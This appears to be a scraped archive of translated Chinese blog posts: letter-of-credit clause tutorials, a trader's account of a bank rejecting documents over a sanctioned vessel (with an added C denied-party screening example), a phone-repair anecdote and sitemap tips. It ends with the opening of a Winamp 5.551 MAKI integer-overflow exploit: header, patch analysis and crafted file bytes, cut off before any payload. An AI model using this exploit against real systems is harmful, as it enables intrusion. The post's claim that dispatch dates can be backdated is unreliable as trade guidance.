Characteristics and Differences of Letter of Credit Clauses by Country (Part 1)

A classic letter-of-credit tutorial picked up online.
Source: Examda, http://www.examda.com
I. Characteristics of L/C clauses from Hong Kong and Macau
Letters of credit from Hong Kong and Macau are those issued from Hong Kong and Macau. Their clauses have the following characteristics:
1. The credit often requires one set of non-negotiable documents to be sent to a named party
Example (1): ONE SET OF NON-NEGOTIABLE COPIES OF SHIPPING DOCUMENTS HAS BEEN AIRMAILED DIRECT TO THE APPLICANT WITHIN TWO DAYS AFTER SHIPMENT.
Translation: One set of non-negotiable copies of the shipping documents has been airmailed directly to the applicant within two days after shipment.
Analysis: In practice, non-negotiable shipping documents (which do not include the original bill of lading) carry no right to take delivery of the goods, so they usually cannot be presented to a bank for negotiation. They are sent to the applicant or its nominee so that it can arrange early to receive the goods and line up sales. The exporter simply needs to send them as required.
2. When goods are transhipped, the credit requires the bill of lading to show the name of the on-carrying vessel
Example (1): IF GOODS ARE SUBJECT TO TRANSHIPMENT, THE NAME OF THE ON-CARRYING VESSEL MUST BE SHOWN ON THE BILLS OF LADING.
Translation: If the goods are to be transhipped, the name of the second-leg (on-carrying) vessel must be shown on the bill of lading.
Analysis: Because of their geographic position, Hong Kong and Macau usually serve as transhipment ports between mainland China and other countries, so most cargo is entrepôt trade that has to change vessels. To track the shipment promptly and accurately, the applicant often requires the first-leg bill of lading to name the on-carrying vessel. The exporter should take care to meet this condition.
3. When goods are transhipped, the credit requires the relevant transhipment risks to be insured
Example (1): IF GOODS ARE SUBJECT TO TRANSHIPMENT, INSURANCE POLICY OR CERTIFICATE MUST STATE THAT THE RISKS OF LOSS AND/OR DAMAGE DUE TO TRANSHIPMENT HAVE BEEN INCLUDED.
Translation: If the goods are to be transhipped, the insurance policy or certificate must state that the risks of loss and/or damage due to transhipment are covered.
Analysis: This clause reflects the applicant's concern about losses while the goods are transhipped through Hong Kong or Macau. When insuring the export shipment, the exporter can remind the insurer to add this clause to the policy.
II. Characteristics of L/C clauses from other Asian countries
Letters of credit from other Asian countries are those from Asian countries other than Hong Kong and Macau (such as Japan, South Korea, Singapore, Malaysia, Thailand and Vietnam). Their clauses have the following characteristics:
1. The credit prohibits telegraphic (T/T) reimbursement
Example (1): T.T. REIMBURSEMENT IS NOT ACCEPTABLE.
Translation: T/T reimbursement is not accepted.
Analysis: A T/T reimbursement clause allows the negotiating bank, after negotiating the documents, to claim payment immediately from the issuing bank or its nominated reimbursing bank by cable, telex or other electronic means. If the credit expressly prohibits T/T reimbursement, the claim can only be sent by mail and payment arrives more slowly. This clause is common in credits from Japan, where its purpose is to delay payment, a sign of how shrewd the merchants there are. To speed up collection, the exporter should try to obtain T/T reimbursement for large amounts.
2. The credit names a specific shipping company
Example (1): SHIPMENT SHOULD BE EFFECTED BY CHINA OCEAN SHIPPING AGENCY(PENAVICO) BEIHAI BRANCH OFFICE ONLY.
Translation: Shipment may be made only by China Ocean Shipping Company, Beihai Branch.
Analysis: A named-carrier clause is one in which the credit stipulates that a particular shipping company must carry the goods. It appears mainly in credits from South Korea. In general a credit does not name a carrier, but some countries impose this requirement for political or diplomatic reasons or for the security of the shipment. The exporter should take care to comply.
3. The credit names a reimbursing bank
Example (1): IN REIMBURSEMENT, NEGOTIATING BANK IS TO DRAW SIGHT DRAFTS ON UNITED OVERSEAS BANK LTD., 130 LIBERTY STREET, SUITE 2712, NEW YORK, N.Y. 10006, USA AND CERTIFY TO US THAT ALL TERMS & CONDITIONS OF THIS CREDIT HAVE BEEN COMPLIED WITH.
Translation: For reimbursement, the negotiating bank should draw sight drafts on United Overseas Bank Ltd., New York, as paying bank, and certify to us that all terms and conditions of this credit have been complied with.
Analysis: A named-reimbursing-bank clause is one in which the credit stipulates that payment is to be obtained through a specified reimbursing bank. It appears mainly in credits from Singapore, which name a reimbursing bank in New York to facilitate prompt settlement. The exporter's bank can use this clause to claim payment quickly.
4. The credit requires a receipt from a specified courier
Example (1): RECEIPT OF DHL SHOWING THAT ONE SET OF NON-NEGOTIABLE DOCUMENT PLUS 1/3 ORIGINAL B/L HAS BEEN SENT TO KING BRIGHT CO. LTD. CENTRAL, HONG KONG (TRANSFEROR) BY DHL WITHIN 2 DAYS AFTER SHIPMENT DATE.
Translation: A DHL receipt showing that one set of non-negotiable documents plus one of the three original bills of lading was sent by DHL to King Bright Co. Ltd., Central, Hong Kong (the transferor) within two days after the shipment date.
Analysis: A specified-courier-receipt clause is one in which the credit stipulates that documents must be sent by a named courier and that the courier's receipt must be presented. It is common in credits from Vietnam. A Hong Kong merchant acting as middleman (the transferor) collects its margin through a transferable credit, hence the requirement to send one original bill of lading to the transferor. The clause is clearly unfavourable to the exporter, who should accept it only when it knows the transferor well and is confident it can present complying documents.
5. The credit requires shipment by regular liner vessel
Example (1): SHIPMENT MUST BE MADE IN REGULAR LINER VESSEL AND A CERTIFICATE TO THIS EFFECT MUST ACCOMPANY THE DOCUMENTS FOR NEGOTIATION.
Translation: Shipment must be made by a regular liner vessel, and a certificate to this effect must accompany the documents presented for negotiation.
Analysis: A regular-liner clause is one in which the credit stipulates shipment by liner service. It appears mainly in credits from Bangladesh. The importer fears the risk of carriage by other vessels, so it specifies a regular liner. The exporter can book a liner sailing according to local shipping conditions.
6. The credit requires shipment by a specified class of vessel
Example (1): GOODS MUST BE SHIPPED IN SEAWORTHY CONFERENCE VESSEL WHICH SHOULD BE ON APPROVED LIST OF THE LLOYDS.
Translation: The goods must be shipped on a seaworthy conference vessel on Lloyd's approved list.
Analysis: A specified-vessel clause is one in which the credit requires carriage by vessels meeting a stated condition. It appears mainly in credits from India; the importer includes it to protect the safety of the shipment. The exporter should check whether a qualifying vessel is available locally and, if not, ask for an amendment.
7. The credit requires an exchange-rate condition to be marked on the documents
Example (1): BENEFICIARY'S MANUALLY SIGNED DRAFTS AT SIGHT ON ABOVE NAMED IMPORTERS FOR FULL INVOICE VALUE BEARING CLAUSE "PAYABLE AT BANK'S CURRENT SELLING RATE OF EXCHANGE ALONGWITH MARK-UP AT RATE PREVAILING IN PAKISTAN" & ORIGINAL INVOICES NOT EXCEEDING THIS CREDIT AMOUNT, PREPARED IN THE NAME OF IMPORTERS, IN OCTUPLICATE CERTIFYING MERCHANDISE TO BE OF ORIGIN OF .
Translation: The beneficiary's manually signed sight drafts, drawn on the above-named importers for the full invoice value and bearing the clause "payable at the bank's current selling rate of exchange along with the mark-up at the rate prevailing in Pakistan"; together with original invoices, not exceeding the credit amount, made out in the importers' name, in octuplicate, certifying the origin of the goods.
Analysis: An exchange-rate clause is one in which the credit requires the documents (usually the invoice or draft) to carry a stated exchange-rate condition. It appears mainly in credits from Pakistan; the importer or its bank fixes this clause in advance to guard against exchange-rate risk. When preparing documents, the exporter must remember to add the exchange-rate clause to the draft.

Please respect copyright when reposting; source: 秋天博客
Article link: https://www.cfresh.net/international-trade/194

Malaysian L/C presentation notes: what parties to a transaction under a US- or UK-owned bank's credit should watch for

This shipment was our fourth letter-of-credit transaction with a Malaysian customer. The first three went smoothly, but this one hit a snag, so I am writing it up to share.
Let me start with the bill of lading. The forwarder I was given this time was terrible. The customer initially wanted its nominated forwarder; to save time on the bill of lading I pushed to use our own forwarder, and in return I squeezed the freight rate very low. The result was that I had to issue four letters of indemnity in a row, all requiring the company seal, which is an excessive demand. Not showing the consignee's contact details on the B/L required an LOI; not showing the HS code required an LOI; issuing a vessel certificate required an LOI; and when the carrier's agent misread the B/L proof and had to reissue the B/L, that also required an LOI from us. The last one left me speechless. Normally B/L drafts are corrected by hand over fax until the final OK copy is sent to the forwarder. This time I put all the required changes into a Word document and sent it to the carrier through the forwarder, and the carrier still managed to drop a sentence. Impressive operational standards.
The B/L was reissued on 23 May and reached me on Saturday, so on Monday the 25th, the next banking day, I presented the original L/C advice and the presentation documents to the bank's L/C department, and specifically told the document checker that that day was both the latest presentation date and the expiry date of the credit, so she should ideally dispatch the documents the same day and no later than the next day. Some may ask whether dispatching them the next day would make the presentation invalid. I had asked the bank about this earlier, when the B/L error was found and reissue was planned: the bank said the issuing bank judges the dispatch date not by when the documents were physically mailed but by the date the advising (negotiating) bank marks on the credit, so the L/C dispatch date can be backdated just like a house B/L. The bank did in fact dispatch the documents the next day (different people at the bank gave different answers, one saying the 25th and the other the 26th; the internal management of Bank of China's L/C department is still somewhat chaotic). On the third day the customer asked for the courier tracking number, because Standard Chartered Malaysia (the issuing bank) had still not received the documents. I asked our bank, got the number, looked it up on DHL's website and was stunned: it showed a shipment sent in April, already signed for, originating in Taiwan and destined for Sri Lanka. I called DHL to confirm and got the same result; I confirmed again with the bank, and the number was the same. After repeated explanations DHL offered an explanation: the waybill number might have been duplicated, meaning two shipments were using the same number. Hilarious; domestic couriers almost never duplicate waybill numbers, so how could DHL? I handed the problem to the bank to sort out with DHL, and a few hours later there was an answer: it really was a duplicate. Looking up the number on DHL's website now gave two results, and you had to pick one before seeing the detailed tracking. Once it could be tracked, everything was fine, and I replied to the customer with an explanation.
Today the customer's finance staff told me over MSN that the bank would not release the documents to them. That struck me as odd: unless the customer refuses payment, why would the bank withhold the documents? The other side explained that, because our goods had been carried by an Iranian shipping line, Standard Chartered Malaysia had, after examination, finally rejected the presentation under this credit, on the grounds that Standard Chartered does not accept documents for carriage by an Iranian shipping company. I was baffled. I dug out the credit and re-read the relevant clauses myself and still could not find the problem. The only thing I found was a transhipment clause saying the vessel must not call at certain countries, including Iran; I had already had the carrier issue a vessel certificate in advance, stating per that clause: "HEREBY WE CERTIFY THAT THE VESSEL FROM SHANGHAI PORT, CHINA TO PASIR GUDANG, MALAYSIA, TRANSSHIPMENT, IF ANY, IS PROHIBITED THROUGH IRAN, CUBA, NORTH KOREA, SUDAN, SYRIA AND MYANMAR." I asked our bank again and then learned the reason: US- and UK-owned banks are extremely sensitive to these countries appearing anywhere in a transaction. Specifically, for credits issued by these banks, no company or other entity from Iran, Cuba, North Korea, Sudan, Syria or Myanmar, the countries under economic sanctions, may be involved at any point in the transaction or in the carriage of the goods. This is an unwritten rule of such credits. Although our B/L did not show the word "Iran", Standard Chartered Malaysia determined that the vessel "SAHAND" was Iranian-flagged. On that basis it treated this as a discrepancy, rejected the presentation under the credit, refused to let our customer (the applicant) accept the discrepancy, and held that this was already spelled out in the third paragraph of field 47B of the credit.
The third paragraph of Standard Chartered's field 47B reads as follows:
SCB WILL NOT BE LIABLE IF IT OR ANOTHER PERSON INVOLVED IN THIS TRANSACTION FAILS TO PERFORM THE TRANSACTION OR DELAYS IT OR DISCLOSES INFORMATION TO A REGULATOR OR OTHER AUTHORITY AS A RESULT OF SANCTIONS REGULATION OR THEIR OWN POLICY, OR FOR ANY ACTION WHICH MAY BE TAKEN OR REQUIRED BY A REGULATOR. IF IN DOUBT, BEFORE INVOLVING A SUSPECTED SANCTIONED PARTY, OR A PARTY LOCATED IN A SANCTIONED COUNTRY YOU MAY CONTACT SCB FOR ADVICE, WHICH WILL BE BASED ON REGULATIONS AND THE BANK'S POLICY AT THE TIME OF ENQUIRY, IF WE AGREE, THE ABOVE PROVISION WILL STILL APPLY. EXAMPLES OF THE INVOLVEMENT OF A SANCTIONED PARTY MAY INCLUDE A TRADING PARTY, BUYER, SUPPLIER, CONSIGNEE OR NOTIFY PARTY, BANK, SHIPPING COMPANY, AGENT, VESSEL, INSURANCE COMPANY, ASSIGNEE OR TRANSFEREE, PRESENTATION PARTY, OR PLACE OF ORIGIN, LOADING, TRANSSHIPMENT, RECEIPT, DISCHARGE OR FINAL DESTINATION OF GOODS. TRANSHIPMENT, IF ANY, IS PROHIBITED THROUGH IRAN, CUBA, NORTH KOREA, SUDAN, SYRIA AND MYANMAR.
I had always understood this clause to mean only that, in the case of transhipment, the vessel must not call at ports in the countries listed (a vessel certificate would suffice), because there is a full stop before "TRANSHIPMENT", which clearly makes the transhipment sentence a separate statement. Only today did I learn that it is not just a transhipment restriction: none of the preceding "trading party, buyer, supplier, consignee or notify party, bank, shipping company, agent, vessel, insurance company, assignee or transferee, presentation party, or place of origin, loading, transhipment, receipt, discharge or final destination" may have any connection with Iran, Cuba, North Korea, Sudan, Syria or Myanmar, or US- and UK-owned banks will turn the presentation away.
Following a method the bank provided today, colleagues in the trade should from now on pay particular attention, when examining an L/C and choosing a carrier, to the shipping company name and vessel name shown on the bill of lading. You can download the latest SDN list from the Specially Designated Nationals List (SDN) section on the left of the US Treasury website. The list is compiled by the Office of Foreign Assets Control (OFAC) of the US Treasury and mainly contains organisations OFAC has designated as terrorist groups or as involved in transnational drug and narcotics trafficking or weapons of mass destruction. The Treasury download page for the SDN list is http://www.ustreas.gov/offices/enforcement/ofac/sdn/; it is available in PDF and TXT formats, most recently updated on 29 May 2009. Unfortunately, the name of the vessel that carried this shipment to Malaysia appears in the SDN list, although the shipping company does not. My guess now is that Standard Chartered very likely did not look up the vessel's flag from its name, but matched the name directly against the SDN list. The vessel name SAHAND is on the third-to-last page of the list and was probably added only in the last two months. From now on, when dealing with credits from US- and UK-owned banks, everyone should avoid using shipping companies, vessels, forwarders and so on from these sanctioned countries; in short, none of these countries may be involved anywhere in the transaction, to avoid unnecessary trouble when the issuing bank examines the documents.
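Screening the parties on a bill of lading against a denied-party list, as an added example in C that is not part of the original post. The list entries and party names below are constructed for the example (only the vessel name comes from the post); a real check loads the current SDN download from the Treasury page into the table instead of hard-coding it.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Constructed denied-party entries for the example; NOT a copy of the SDN
 * list. Only "SAHAND" is taken from the post. A real check reads the
 * current SDN download from the Treasury site into this table. */
static const char *const DENIED_LIST[] = {
    "SAHAND",
    "EXAMPLE SHIPPING LINES CO.",
    "SAMPLE VESSEL LINES",
};
#define DENIED_COUNT (sizeof DENIED_LIST / sizeof DENIED_LIST[0])

/* Canonical form " TOKEN TOKEN ": upper-case alphanumeric words separated
 * and surrounded by single spaces, so "m/v Sahand" and "SAHAND" compare on
 * whole words and punctuation or case differences cannot hide a hit. */
static void normalize(const char *in, char *out, size_t cap)
{
    size_t n = 0;
    int in_word = 0;
    if (cap < 2) { if (cap) out[0] = '\0'; return; }
    out[n++] = ' ';
    for (; *in != '\0' && n + 2 < cap; in++) {
        if (isalnum((unsigned char)*in)) {
            out[n++] = (char)toupper((unsigned char)*in);
            in_word = 1;
        } else if (in_word) {
            out[n++] = ' ';
            in_word = 0;
        }
    }
    if (in_word)
        out[n++] = ' ';
    out[n] = '\0';
}

/* Returns the index of the first denied-list entry whose word sequence
 * appears in `party`, or -1 when the party is clear. Matching is
 * deliberately over-inclusive: every hit is for a human to review. */
int screen_party(const char *party)
{
    char p[256], e[256];
    normalize(party, p, sizeof p);
    for (size_t i = 0; i < DENIED_COUNT; i++) {
        normalize(DENIED_LIST[i], e, sizeof e);
        if (strlen(e) > 2 && strstr(p, e) != NULL)   /* skip empty entries */
            return (int)i;
    }
    return -1;
}

/* A party named on the bill of lading, in one of the roles the 47B clause
 * lists (vessel, shipping company, consignee, ...). */
struct bl_party { const char *role; const char *name; };

/* Screens every party and reports each hit; returns the number of hits so
 * the caller can hold the presentation for review when it is non-zero. */
int screen_shipment(const struct bl_party *parties, size_t count)
{
    int hits = 0;
    for (size_t i = 0; i < count; i++) {
        int idx = screen_party(parties[i].name);
        if (idx >= 0) {
            printf("HIT: %s \"%s\" matches list entry \"%s\"\n",
                   parties[i].role, parties[i].name, DENIED_LIST[idx]);
            hits++;
        }
    }
    return hits;
}

int main(void)
{
    /* Constructed parties for one shipment; the vessel is the one in the post. */
    const struct bl_party bl[] = {
        { "vessel",           "M/V Sahand" },
        { "shipping company", "Constructed Ocean Carrier Ltd." },
        { "consignee",        "Constructed Consignee Sdn. Bhd." },
    };
    int hits = screen_shipment(bl, sizeof bl / sizeof bl[0]);
    printf("%d hit(s): %s\n", hits,
           hits ? "hold presentation and escalate" : "no list match");
    return hits ? 1 : 0;
}
```

Whole-word matching after normalisation is only a starting point; production screening adds transliteration and fuzzy matching and refreshes the list on every run.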
In the end we agreed with the customer to switch to T/T payment and asked the issuing bank to return the presentation documents the way they came, to our bank and then to the company, after which we will mail them to the customer for customs clearance and delivery; this should all be completed next week.
This episode showed me again that my knowledge of letters of credit needs further work; had I understood the relevant clauses and rules more thoroughly earlier, this would not have happened.
Reflect, and learn...

Article link: https://www.cfresh.net/international-trade/195

When brand-name after-sales service meets knock-offs

Yesterday my Nokia 6300 had a minor problem and I took it to the after-sales centre for inspection, where I noticed something amusing. Right next door to the official Nokia service centre was an "XX Mobile Phone Shop" advertising specialist Nokia repairs; walking into the Nokia centre, there was a prominent notice board by the door, which immediately brought to mind the XX Mobile Phone Shop on the other side of the wall.

[Image: Nokia after-sales notice board]

The notice board by the door of the Nokia service centre lobby (the city name in the picture has been blurred out)

[Image: the official service centre and the knock-off one]

The "regular army" and the "knock-off army": the knock-off shop's outer wall, glass door and counter are plastered with "Nokia repair specialist" signs.

My first reaction was to laugh, because not far along the same road is the local administration bureau, whose gate carries a huge banner reading "To fight fakes and protect your rights, call 12315". Then I reflected, and I put it down mainly to two causes: 1) public awareness of consumer rights and copyright is still weak, as the "Baofeng incident" also showed; 2) Nokia's prices for parts and out-of-warranty repairs are simply too high, as anyone who has been to a Nokia service centre will know.
Looking more widely, it is not just Nokia; many computer makers face the same problem. On a street in Zhongguancun lined with brand-name PC service centres, knock-off service shops like the one in the picture are everywhere, some even copying the signage of the brand's own centres. Why? Mainly because the brand's parts and repair costs are too high; as long as the repair gets done, ordinary consumers would rather go somewhere cheaper, even a knock-off. Electronics prices are now very transparent and the era of fat sales margins is over, but these manufacturers have found a new profit driver, after-sales service, and use high or even exorbitant repair prices to make up the margin they no longer get on the sale.
The competition between official and knock-off service is really a contest between brand manufacturers and ordinary consumers.

Article link: https://www.cfresh.net/other/196

Sitemaps: introduction, creation and submission

No webmaster will find sitemaps an unfamiliar concept; for a mature website, a sitemap is indispensable.
Sitemaps fall into two kinds depending on their audience:
For visitors: a visitor-facing sitemap is usually linked from the site's navigation bar so visitors can click through to it. Like a real map, it provides site navigation, laying out the site's functional structure and services in an orderly way for easy access. It is usually an HTML file, generated directly by the site's control panel (back end).
For search engines: a search-engine sitemap is not displayed on the site's pages; its purpose is to help search engines crawl and analyse all of the site's links, and it generally contains almost every internal link. It is usually an XML file (the format varies with the search engine it is submitted to), placed in the site root and named sitemap, for example http://www.0point.cn/sitemap.xml. It is usually generated by a dedicated tool, or can be generated online.
Now for generating the latter, the search-engine sitemap. Common generators include SiteMapBuilder and SiteMapGenerator; there are also many domestic sitemap tools, among the best being the Laohu (Tiger) sitemap generator. For static pages organised in hierarchical directories I recommend the Laohu sitemap generator: it is small, fully configurable and, most importantly, effectively filters out the duplicate directories that ordinary sitemap tools produce. It works very well with a fully static pjblog.
If you find software too cumbersome and your site is not large, try online generation at http://www.xml-sitemaps.com/: four short steps and a little patience, and your sitemap appears, ready to download to your machine. Very user-friendly.
Once the sitemap is made, the next step is submission. Submission addresses for the major search engines:
Google: https://www.google.com/webmasters/tools/login?hl=zh_CN
Google also accepts online URL submission at: http://www.google.com/webmasters/sitemaps/ping?sitemap=http://your.domainnames/sitemap.xml
Yahoo: http://sitemap.cn.yahoo.com/mysites
Baidu unfortunately does not yet accept sitemap submissions.

Related notes and links:
1. A sitemap file submitted to a search engine must not contain more than 5,000 URLs; if it does, split it into several files and submit them separately.
2. Google Sitemap errors and warnings and how to fix them

Article link: https://www.cfresh.net/pc-tech/197

Winamp 5.551 MAKI parsing integer overflow vulnerability
/**************************************************************
Winamp 5.551 MAKI Parsing Integer Overflow Exploit !!!

Tested on: Vista SP1 and XP SP3
Release Date: May 22 2009
Vendor's web site: http://www.winamp.com/
Version Tested: Winamp 5.551
Not vulnerable: Winamp 5.552

Credits to Monica Sojeong Hong down at vrt-sourcefire for the overflow.
http://vrt-sourcefire.blogspot.com

As we know we are able to overwrite the exception handlers, so
we can exploit this on multiple OSes. I tested these on XP SP3 <eng>
and <Vista SP1> and all worked fine.

I wrote the exploits because I had tried the 2 exploits posted
on milw0rm (they were tested on WinXP SP3 and Vista SP1) and I couldn't
get them to execute shellcode, which prompted me into writing my
own version!!

Below I have provided a look into the disassembly of the new
changes in the 5.552 version of Winamp; the main change was in
gen_ff.dll.

--snip--

A quick look at the new gen_ff.dll.
----------------------------------
loc_12094F62:
mov     ax, [ebx]
movzx   edi, ax       -Extends ax into edi register.-
inc     ebx
push    edi             ; Size
inc     ebx
lea     eax, [ebp+MultiByteStr]
push    ebx             ; Src
push    eax             ; Dst
call    memmove
------------------------
loc_120951E9:
mov     edi, [ebx]
add     ebx, 4
mov     ax, [ebx]
movzx   esi, ax        -Extends ax into esi register.-
inc     ebx
push    esi             ; Size
inc     ebx
lea     eax, [ebp+var_2014C]  <– This was also changed.
push    ebx             ; Src
push    eax             ; Dst
call    memmove

This is a simple rundown of the new patch
that was applied to Winamp 5.552. If we look closely we can see they
changed the sign extension.

=5.551 .dll=
----------
movsx esi, ax  = movsx(dest, source);
Copies the source operand to dest and sign-extends the value.

Changed in the new gen_ff.dll.
=5.552 .dll=
----------
movzx esi, ax

Zero-extends the 8-bit registers.
Copies data and sign extends the data while copying it.

Destination = 16 - 32 bit.
Source =     8 or a 16byte or maybe even 1 byte of memory
Source =     the destination must be of greater value than the source.

These were a few of the changes within the new dll from Winamp. I'm
sure if you want to dig deeper you can get both dlls and compare them
to see the changes that were made. So basically they have changed the
instruction from copy with sign extension to copy with zero extension.

This can also be seen when looking at the stack at the time of the
exception in the new version of Winamp after stepping through the exception:
although we can cause an exception we can't overwrite the 4 bytes on the
stack, we can only overwrite 2 and it is always capped with 00FF.

--snip--

Special thanks to str0ke 🙂

Credits to n00b for writing exploit code !!
Progression is always a good thing.
----------
Disclaimer
----------
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.

I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Educational use only..!!

***************************************************************/

#include <stdio.h>
#define MAKI "mcvcore.maki"

unsigned char First_Header[] =
{
    0x46, 0x47, 0x03, 0x04, 0x17, 0x00, 0x00, 0x00, 0x2A, 0x00, 0x00, 0x00,
    0x71, 0x49, 0x65, 0x51, 0x87, 0x0D, 0x51, 0x4A, 0x91, 0xE3, 0xA6, 0xB5,
    0x32, 0x35, 0xF3, 0xE7, 0x64, 0x0F, 0xF5, 0xD6, 0xFA, 0x93, 0xB7, 0x49,
    0x93, 0xF1, 0xBA, 0x66, 0xEF, 0xAE, 0x3E, 0x98, 0x7B, 0xC4, 0x0D, 0xE9,
    0x0D, 0x84, 0xE7, 0x4A, 0xB0, 0x2C, 0x04, 0x0B, 0xD2, 0x75, 0xF7, 0xFC,
    0xB5, 0x3A, 0x02, 0xB2, 0x4D, 0x43, 0xA1, 0x4B, 0xBE, 0xAE, 0x59, 0x63,
    0x75, 0x03, 0xF3, 0xC6, 0x78, 0x57, 0xC6, 0x87, 0x43, 0xE7, 0xFE, 0x49,
    0x85, 0xF9, 0x09, 0xCC, 0x53, 0x2A, 0xFD, 0x56, 0x65, 0x36, 0x60, 0x38,
    0x1B, 0x46, 0xA7, 0x42, 0xAA, 0x75, 0xD8, 0x3F, 0x66, 0x67, 0xBF, 0x73,
    0xF4, 0x7A, 0x78, 0xF4, 0xBB, 0xB2, 0xF7, 0x4E, 0x9C, 0xFB, 0xE7, 0x4B,
    0xA9, 0xBE, 0xA8, 0x8D, 0x02, 0x0C, 0x37, 0x3A, 0xBF, 0x3C, 0x9F, 0x43,
    0x84, 0xF1, 0x86, 0x88, 0x5B, 0xCF, 0x1E, 0x36, 0xB6, 0x5B, 0x0C, 0x5D,
    0xE1, 0x7D, 0x1F, 0x4B, 0xA7, 0x0F, 0x8D, 0x16, 0x59, 0x94, 0x19, 0x41,
    0x99, 0xE1, 0xE3, 0x4E, 0x36, 0xC6, 0xEC, 0x4B, 0x97, 0xCD, 0x78, 0xBC,
    0x9C, 0x86, 0x28, 0xB0, 0xE5, 0x95, 0xBE, 0x45, 0x72, 0x20, 0x91, 0x41,
    0x93, 0x5C, 0xBB, 0x5F, 0xF9, 0xF1, 0x17, 0xFD, 0x4E, 0x6D, 0x90, 0x60,
    0x7E, 0x53, 0x2E, 0x48, 0xB0, 0x04, 0xCC, 0x94, 0x61, 0x88, 0x56, 0x72,
    0xC0, 0xBC, 0x3A, 0x40, 0x22, 0x6F, 0xD6, 0x4B, 0x8B, 0xA4, 0x10, 0xC8,
    0x29, 0x93, 0x25, 0x47, 0x4D, 0x3E, 0xAA, 0x97, 0xD0, 0xF4, 0xA8, 0x4F,
    0x81, 0x7B, 0x0D, 0x0A, 0xF2, 0x2A, 0x45, 0x49, 0x83, 0xFA, 0xBB, 0xE4,
    0x64, 0xF4, 0x81, 0xD9, 0x49, 0xB0, 0xC0, 0xA8, 0x5B, 0x2E, 0xC3, 0xBC,
    0xFD, 0x3F, 0x5E, 0xB6, 0x62, 0x5E, 0x37, 0x8D, 0x40, 0x8D, 0xEA, 0x76,
    0x81, 0x4A, 0xB9, 0x1B, 0x77, 0xBE, 0x97, 0x4F, 0xCE, 0xB0, 0x77, 0x19,
    0x4E, 0x99, 0x56, 0xD4, 0x98, 0x33, 0xC9, 0x6C, 0x27, 0x0D, 0x20, 0xC2,
    0xA8, 0xEB, 0x51, 0x2A, 0x4B, 0xBA, 0x7F, 0x5D, 0x4B, 0xC6, 0x5D, 0x4C,
    0x71, 0x38, 0xBA, 0x1E, 0x8D, 0x9E, 0x48, 0x3E, 0x48, 0xB9, 0x60, 0x8D,
    0x1F, 0x43, 0xC5, 0xC4, 0x05, 0x40, 0xC9, 0x08, 0x0F, 0x39, 0xAF, 0x23,
    0x4B, 0x80, 0xF3, 0xB8, 0xC4, 0x8F, 0x7E, 0xBB, 0x59, 0x72, 0x86, 0xAA,
    0xEF, 0x0E, 0x31, 0xFA, 0x41, 0xB7, 0xDC, 0x85, 0xA9, 0x52, 0x5B, 0xCB,
    0x4B, 0x44, 0x32, 0xFD, 0x7D, 0x51, 0x37, 0x7C, 0x4E, 0xBF, 0x40, 0x82,
    0xAE, 0x5F, 0x3A, 0xDC, 0x33, 0x15, 0xFA, 0xB9, 0x5A, 0x7D, 0x9A, 0x57,
    0x45, 0xAB, 0xC8, 0x65, 0x57, 0xA6, 0xC6, 0x7C, 0xA9, 0xCD, 0xDD, 0x8E,
    0x69, 0x1E, 0x8F, 0xEC, 0x4F, 0x9B, 0x12, 0xF9, 0x44, 0xF9, 0x09, 0xFF,
    0x45, 0x27, 0xCD, 0x64, 0x6B, 0x26, 0x5A, 0x4B, 0x4C, 0x8C, 0x59, 0xE6,
    0xA7, 0x0C, 0xF6, 0x49, 0x3A, 0xE4, 0x05, 0xCB, 0x6D, 0xC4, 0x8A, 0xC2,
    0x48, 0xB1, 0x93, 0x49, 0xF0, 0x91, 0x0E, 0xF5, 0x4A, 0xFF, 0xCF, 0xDC,
    0xB4, 0xFE, 0x81, 0xCC, 0x4B, 0x96, 0x1B, 0x72, 0x0F, 0xD5, 0xBE, 0x0F,
    0xFF, 0xE1, 0x8C, 0xE2, 0x01, 0x59, 0xB0, 0xD5, 0x11, 0x97, 0x9F, 0xE4,
    0xDE, 0x6F, 0x51, 0x76, 0x0D, 0x0A, 0xBD, 0xF8, 0xF0, 0x80, 0xA5, 0x1B,
    0xA6, 0x42, 0xA0, 0x93, 0x32, 0x36, 0xA0, 0x0C, 0x8D, 0x4A, 0x1B, 0x34,
    0x2E, 0x9B, 0x98, 0x6C, 0xFA, 0x40, 0x8B, 0x85, 0x0C, 0x1B, 0x6E, 0xE8,
    0x94, 0x05, 0x71, 0x9B, 0xD5, 0x36, 0xFD, 0x03, 0xF8, 0x4A, 0x97, 0x95,
    0x05, 0x02, 0xB7, 0xDB, 0x26, 0x7A, 0x10, 0xF2, 0xD5, 0x7F, 0xC4, 0xAC,
    0xDF, 0x48, 0xA6, 0xA0, 0x54, 0x51, 0x57, 0x6C, 0xDC, 0x76, 0x35, 0xA5,
    0xBA, 0xB5, 0xB3, 0x05, 0xCB, 0x4D, 0xAD, 0xC1, 0xE6, 0x18, 0xD2, 0x8F,
    0x68, 0x96, 0xC1, 0xFE, 0x29, 0x61, 0xB7, 0xDA, 0x51, 0x4D, 0x91, 0x65,
    0x01, 0xCA, 0x0C, 0x1B, 0x70, 0xDB, 0xF7, 0x14, 0x95, 0xD5, 0x36, 0xED,
    0xE8, 0x45, 0x98, 0x0F, 0x3F, 0x4E, 0xA0, 0x52, 0x2C, 0xD9, 0x82, 0x4B,
    0x3B, 0x9B, 0x7A, 0x66, 0x0E, 0x42, 0x8F, 0xFC, 0x79, 0x41, 0x15, 0x80,
    0x9C, 0x02, 0x99, 0x31, 0xED, 0xC7, 0x19, 0x53, 0x98, 0x47, 0x98, 0x63,
    0x60, 0xB1, 0x5A, 0x29, 0x8C, 0xAA, 0x4D, 0xC1, 0xBB, 0xE2, 0xF6, 0x84,
    0x73, 0x41, 0xBD, 0xB3, 0xB2, 0xEB, 0x2F, 0x66, 0x55, 0x50, 0x94, 0x05,
    0xC0, 0x73, 0x1F, 0x96, 0x1B, 0x40, 0x9B, 0x1B, 0x67, 0x24, 0x27, 0xAC,
    0x41, 0x65, 0x22, 0xBA, 0x3D, 0x59, 0x77, 0xD0, 0x76, 0x49, 0xB9, 0x52,
    0xF4, 0x71, 0x36, 0x55, 0x40, 0x0B, 0x82, 0x02, 0x03, 0xD4, 0xAB, 0x3A,
    0x87, 0x4D, 0x87, 0x8D, 0x12, 0x32, 0x6F, 0xAD, 0xFC, 0xD5, 0x83, 0xC2,
    0xDE, 0x24, 0x6E, 0xB7, 0x36, 0x4A, 0x8C, 0xCC, 0x9E, 0x24, 0xC4, 0x6B,
    0x6C, 0x73, 0x37, 0x00
};

/*Trigger the Integer overflow*/
